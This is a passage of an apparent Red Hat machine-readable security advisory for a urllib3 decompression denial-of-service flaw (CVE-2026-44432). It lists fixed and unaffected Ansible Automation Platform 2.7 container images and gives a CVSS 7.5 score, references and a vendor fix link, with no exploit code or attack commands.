"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:3312c6acd7a577bd8b3ccda5a65f8505ff76e2acc7a46e7f290a49dfb53cfac4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:c738cf5ef020b44a404402ddd660afc3d418a758751f848068bda4bc5bce0e35_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:adca5f837877df04696709a4826ccae31e2fdc50aa8bc32fabb4ef40cd51f0ef_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fb8342f0f6b8322194bc357c7d9c9d89ef6ca052b88c5618bbf768f555a54b13_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:2fab408777ea512f3cf8ac57d5989fa0017f6352dcead3a320d348a3e2ac1004_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:c014148a6140721bb7733d5f30c7adbe3e2cc6f8a7cd6c3a939ab96f8c9420ee_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:121e0bfb87b57655db4a735762a26e23f1b3de7b105cbf09bb300043601c1b43_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:6a06579accd268ca5203edab2e46b89166ae6024507cc5b4bed2e126cdef7986_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d02ae0212655f8ef70afc7a0656a2fbc95468228b003f6940d01cf4abeb5325b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d10f226739a001a0efc0178f19a73fad722dc85484017d13f388f749a374ffea_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:302cf11b0faed78e07e863d4b1e7e31db47590b571239385475d8a4c3cda47dc_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:7dbf390d29d295f346662b605448a9748e24b8f541a84f55b6b7c81b87c46025_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:e6c019048612b124e9a2100220d46f242f0fd2302bbe42e674bf84c21a56b733_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:f07206e7881bd11636bebb95f7ec9a70cc817f07d7b34f792265a5ec91d4432b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:7007f666eadfd7294801e6412e624dbc4bd2288f13ea8820ee55e7552f471831_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:d71829d8bd9bfdba7d248e2e2cd5795139382947889b71bb96b27f7d443e1591_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ce4ef5c8af91d2056a034f9559a5d92742b18aea7aeaf03d2bacfa92d67c5b9b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ee347c1a7b52e512d6bdd65afda44f0e372abbaf4c1f81750f23fc473becf777_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3641db944490dd326c814487e1c10d5d9d079ba74f8321930ab277fe44b51705_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:7e6ea2d4253efb0aaabce270c56bf8ef84148592862608f501b639566b9996f0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:41c9292a512f44347fc348afd6846e7e8832abde31452ee12ec8eca235acdce4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:f30a9515d678d60e9ac035b876ecdaaa8a4852c87fe55e16bcabf598ad447b14_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:1ad72d1f577d63894eec4278c1b92b6e295cb3c0543b4dd2e93750c2cc83d535_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:5c5bc6761dbd47effea36014affa352bddd5a18696377967f1f50b75df2741fe_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:32560cdb08b7da9d671f9b035e595971c5bdf865c56eb6825b9a4910add1b9cf_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8ef224281fd23b4203da09336df25550db17b01f025e99b8e9821d4bc3ddedfc_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477154"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in urllib3, an HTTP client library for Python. This vulnerability allows a remote attacker to cause excessive resource consumption, such as high CPU usage and massive memory allocation, on the client side. This occurs when urllib3 attempts to decompress an entire HTTP response, even if only a partial read was requested, or when draining the connection after a partial decompression. This can lead to a Denial of Service (DoS) condition.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "urllib3: urllib3: Denial of Service due to excessive HTTP response decompression",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:daefffce756c8c7918377279ada50a9cc127ab0939ed308c786940d5dc42e0d9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:dfde61892d055e89b056f7fb8863f3a0961df2bb8890323b8301670fc8afc66b_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:3a04de6f43c1352f5df5c5a9e19fd8aad23d2921d23dcef8a9f5e121a87fe800_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:cdd7f08ba3846269e6932375c1a7bdb4ed3bfe062ba7bcd5a872def4293150a6_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:51ed36bb2a95df762fa0239faf7bcc70b68dbd5f744bd2094f5e29ecc6700eb3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:8426a97219763cb74366755416683d79e8b56c95da290b0fa2fff59a5db51db3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:0ddbc5f91472e5872912da6131e71df85e87b79ef8ea3d38bb4247f1456d4a00_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:f75e2056244899ae5e2ecab1404663bf554f7451cc521e0d7a75a2f40ecac7a1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:7dcd3a60624fa4f6c9f591ef8ffc48ba0f5152b7108a6070fa8f680c20168c95_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:a8135ef1879793f311f2661c380bd5fbbedc14a4d195aeaa5a4cb04ad4845f49_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:2211c0e7cd573bf30873329c46e91f98ff01fcb7e0753823d4c0517217c31ac3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:a6903f68684eb8f5bc688b75e390727b5ed48b864784657e49611966266c9f3f_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5ffa88952441ddab19ada1bd2603e3614b75d10ef51e38098c2d22d8b358b518_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:afca3fb56256dcb7cb04a67fb52bff0160064c65f901a70fa3e97ed30ddaab7a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:5e1a04dbcddc141f0026ccee871050cf974175b62c3d22b33e5ec3aec54128d3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:ddb59951ccb324d8bd6ae9c6a6093f211bcb08d8cac7c4fb10f191e421aa59d3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:55ad63ce31700829d0df23692d02cb7796404b122f790f9329f4b742c5f6783e_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:587ec88d08d4113f07778f81aae6de62c9e9d971b677b1375b547aa7dd1178c8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:5aa7b2e33b9480f45faf8b4686bfb264838b5c1c62c537c5a2ec7b5a8617ac49_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:830fa58a60fbd7f768e236b2052edd1d37fc7cf383a0ccd65483b09fa5b07bd2_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:a18f77ccf6c524f5d0c11d34d6787b22548194b6897abd491de85b00fc1befd3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:b58803576b7a2e119ffe83ceb252d8d402f1611c891c2c6ac7c4e0399acd848f_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:bd7350b62eb0f2de274eafd7dc32e4cf3073bd597e282268ff17777b9fe5d102_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:fe72e508123fdd2795959017e5572689b039d5bdfc675dc45673c5586fceea17_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:abaebe0c1fbc2a013fad8ec411a449705c8a78759b82ddbe661afd99e90dada5_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:c4f9e3356a2217008bd6f69325ae74d547703f1bcfe39bd74737f30c6914f711_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:017495624b22a5825231dd70443dc9ab359da0df5ea16a5a04e0f4dc915b6e0f_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:fcb7685115cfbf0a10ef87d6bb7a43c251c207a4fd7a31c5908cad85b6ae0e1a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:d15bd832817f039fa3c09d6d74088254b6fae15a5efed7a88279a657b2f23f16_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:e78dd744714feae5ae944c759759bff17c061c7ed2d3bd1454ba763131ed6ee0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:de3d43a8d9a2cf0d533337e825b078205cc37b01c935a4f68ac152a8a7a7533c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:eca1f9bd16210653a372e34a4f40ca4d6330618a2acba64f6f7c2e8e95026da1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:a961d06200887f646ed797932c3159634581fe144e5f29f1fef47ddc859eed31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:bd28a84fe3b750313749ec80d44cac88c7b06408b0caceea08d303f51c1f559a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:3312c6acd7a577bd8b3ccda5a65f8505ff76e2acc7a46e7f290a49dfb53cfac4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:c738cf5ef020b44a404402ddd660afc3d418a758751f848068bda4bc5bce0e35_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:adca5f837877df04696709a4826ccae31e2fdc50aa8bc32fabb4ef40cd51f0ef_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fb8342f0f6b8322194bc357c7d9c9d89ef6ca052b88c5618bbf768f555a54b13_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:2fab408777ea512f3cf8ac57d5989fa0017f6352dcead3a320d348a3e2ac1004_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:c014148a6140721bb7733d5f30c7adbe3e2cc6f8a7cd6c3a939ab96f8c9420ee_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:121e0bfb87b57655db4a735762a26e23f1b3de7b105cbf09bb300043601c1b43_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:6a06579accd268ca5203edab2e46b89166ae6024507cc5b4bed2e126cdef7986_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d02ae0212655f8ef70afc7a0656a2fbc95468228b003f6940d01cf4abeb5325b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:d10f226739a001a0efc0178f19a73fad722dc85484017d13f388f749a374ffea_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:302cf11b0faed78e07e863d4b1e7e31db47590b571239385475d8a4c3cda47dc_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:7dbf390d29d295f346662b605448a9748e24b8f541a84f55b6b7c81b87c46025_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:e6c019048612b124e9a2100220d46f242f0fd2302bbe42e674bf84c21a56b733_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:f07206e7881bd11636bebb95f7ec9a70cc817f07d7b34f792265a5ec91d4432b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:7007f666eadfd7294801e6412e624dbc4bd2288f13ea8820ee55e7552f471831_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:d71829d8bd9bfdba7d248e2e2cd5795139382947889b71bb96b27f7d443e1591_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ce4ef5c8af91d2056a034f9559a5d92742b18aea7aeaf03d2bacfa92d67c5b9b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:ee347c1a7b52e512d6bdd65afda44f0e372abbaf4c1f81750f23fc473becf777_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3641db944490dd326c814487e1c10d5d9d079ba74f8321930ab277fe44b51705_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:7e6ea2d4253efb0aaabce270c56bf8ef84148592862608f501b639566b9996f0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:41c9292a512f44347fc348afd6846e7e8832abde31452ee12ec8eca235acdce4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:f30a9515d678d60e9ac035b876ecdaaa8a4852c87fe55e16bcabf598ad447b14_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:1ad72d1f577d63894eec4278c1b92b6e295cb3c0543b4dd2e93750c2cc83d535_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:5c5bc6761dbd47effea36014affa352bddd5a18696377967f1f50b75df2741fe_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:32560cdb08b7da9d671f9b035e595971c5bdf865c56eb6825b9a4910add1b9cf_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:8ef224281fd23b4203da09336df25550db17b01f025e99b8e9821d4bc3ddedfc_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44432"
},
{
"category": "external",
"summary": "RHBZ#2477154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477154"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44432",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44432"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44432",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44432"
},
{
"category": "external",
"summary": "https://github.com/urllib3/urllib3/security/advisories/GHSA-mf9v-mfxr-j63j",
"url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-mf9v-mfxr-j63j"
}
],
"release_date": "2026-05-13T15:17:12.611000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-15T08:51:13+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.7#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:daefffce756c8c7918377279ada50a9cc127ab0939ed308c786940d5dc42e0d9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:dfde61892d055e89b056f7fb8863f3a0961df2bb8890323b8301670fc8afc66b_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:3a04de6f43c1352f5df5c5a9e19fd8aad23d2921d23dcef8a9f5e121a87fe800_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:cdd7f08ba3846269e6932375c1a7bdb4ed3bfe062ba7bcd5a872def4293150a6_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:25928"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:51ed36bb2a95df762fa0239faf7bcc70b68dbd5f744bd2094f5e29ecc6700eb3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:8426a97219763cb74366755416683d79e8b56c95da290b0fa2fff59a5db51db3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:0ddbc5f91472e5872912da6131e71df85e87b79ef8ea3d38bb4247f1456d4a00_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:f75e2056244899ae5e2ecab1404663bf554f7451cc521e0d7a75a2f40ecac7a1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:7dcd3a60624fa4f6c9f591ef8ffc48ba0f5152b7108a6070fa8f680c20168c95_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:a8135ef1879793f311f2661c380bd5fbbedc14a4d195aeaa5a4cb04ad4845f49_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:2211c0e7cd573bf30873329c46e91f98ff01fcb7e0753823d4c0517217c31ac3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:a6903f68684eb8f5bc688b75e390727b5ed48b864784657e49611966266c9f3f_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5ffa88952441ddab19ada1bd2603e3614b75d10ef51e38098c2d22d8b358b518_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:afca3fb56256dcb7cb04a67fb52bff0160064c65f901a70fa3e97ed30ddaab7a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:5e1a04dbcddc141f0026ccee871050cf974175b62c3d22b33e5ec3aec54128d3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:ddb59951ccb324d8bd6ae9c6a6093f211bcb08d8cac7c4fb10f191e421aa59d3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:55ad63ce31700829d0df23692d02cb7796404b122f790f9329f4b742c5f6783e_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:587ec88d08d4113f07778f81aae6de62c9e9d971b677b1375b547aa7dd1178c8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:5aa7b2e33b9480f45faf8b4686bfb264838b5c1c62c537c5a2ec7b5a8617ac49_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:830fa58a60fbd7f768e236b2052edd1d37fc7cf383a0ccd65483b09fa5b07bd2_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:a18f77ccf6c524f5d0c11d34d6787b22548194b6897abd491de85b00fc1befd3_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:b58803576b7a2e119ffe83ceb252d8d402f1611c891c2c6ac7c4e0399acd848f_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:daefffce756c8c7918377279ada50a9cc127ab0939ed308c786940d5dc42e0d9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:dfde61892d055e89b056f7fb8863f3a0961df2bb8890323b8301670fc8afc66b_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:bd7350b62eb0f2de274eafd7dc32e4cf3073bd597e282268ff17777b9fe5d102_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:fe72e508123fdd2795959017e5572689b039d5bdfc675dc45673c5586fceea17_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:abaebe0c1fbc2a013fad8ec411a449705c8a78759b82ddbe661afd99e90dada5_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:c4f9e3356a2217008bd6f69325ae74d547703f1bcfe39bd74737f30c6914f711_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:017495624b22a5825231dd70443dc9ab359da0df5ea16a5a04e0f4dc915b6e0f_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:fcb7685115cfbf0a10ef87d6bb7a43c251c207a4fd7a31c5908cad85b6ae0e1a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:d15bd832817f039fa3c09d6d74088254b6fae15a5efed7a88279a657b2f23f16_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:e78dd744714feae5ae944c759759bff17c061c7ed2d3bd1454ba763131ed6ee0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:de3d43a8d9a2cf0d533337e825b078205cc37b01c935a4f68ac152a8a7a7533c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:eca1f9bd16210653a372e34a4f40ca4d6330618a2acba64f6f7c2e8e95026da1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:a961d06200887f646ed797932c3159634581fe144e5f29f1fef47ddc859eed31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:bd28a84fe3b750313749ec80d44cac88c7b06408b0caceea08d303f51c1f559a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:3312c6acd7a577bd8b3ccda5a65f8505ff76e2acc7a46e7f290a49dfb53cfac4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:c738cf5ef020b44a404402ddd660afc3d418a758751f848068bda4bc5bce0e35_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:3a04de6f43c1352f5df5c5a9e19fd8aad23d2921d23dcef8a9f5e121a87fe800_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:cdd7f08ba3846269e6932375c1a7bdb4ed3bfe062ba7bcd5a872def4293150a6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:adca5f837877df04696709a4826ccae31e2fdc50aa8bc32fabb4ef40cd51f0ef_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fb8342f0f6b8322194bc357c7d9c9d89ef6ca052b88c5618bbf768f555a54b13_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:2fab408777ea512f3cf8ac57d5989fa0017f6352dcead3a320d348a3e2ac1004_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:c014148a6140721bb7733d5f30c7adbe3e2cc6f8a7cd6c3a939ab96f8c9420ee_arm64",
